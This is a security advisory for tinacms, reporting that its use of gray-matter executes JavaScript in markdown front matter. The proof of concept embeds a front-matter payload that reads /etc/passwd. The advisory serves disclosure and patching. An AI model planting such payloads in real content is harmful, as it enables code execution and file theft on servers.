Vulnerability GHSA-529f-9qwm-9628

High Risk
HIGH RISK
CVSS Score: 8.0
Score Range: 7.0–8.9
High severity vulnerabilities (CVSS 7.0–8.9). Serious vulnerabilities that should be prioritized soon after critical fixes.
9 months ago
December 18, 2025 at 06:45 PM UTC
tinacms is vulnerable to arbitrary code execution
0.0.0-202231073 - 3.1.0
0.0.0-202231073 - 3.1.0

Summary

tinacms is vulnerable to arbitrary code execution

Details

Summary

tinacms uses the gray-matter package in an insecure way allowing attackers that can control the content of the processed markdown files, e.g., blog posts, to execute arbitrary code.

Details

The gray-matter package executes by default the code in the markdown file's front matter. tinacms does not change this behavior when process markdown file, e.g., by passing a custom engine property for js/javascript in the options object.

PoC

  1. Create a tinacms app using the cli/documentation:
npx create-tina-app@latest
  1. Modify one of the blog posts to contain the following front matter:
---js
{
  "title": "Pawned" + console.log(require("fs").readFileSync("/etc/passwd").toString())
}

Timeline

Published
9 months ago
December 18, 2025 at 06:45 PM UTC
Fixed (2.0.3)
9 months ago
December 18, 2025 at 02:17 AM UTC
Fixed (3.1.1)
9 months ago
December 18, 2025 at 02:17 AM UTC
Fixed (2.0.4)
9 months ago
December 18, 2025 at 02:18 AM UTC
Last Modified
9 months ago
December 18, 2025 at 09:26 PM UTC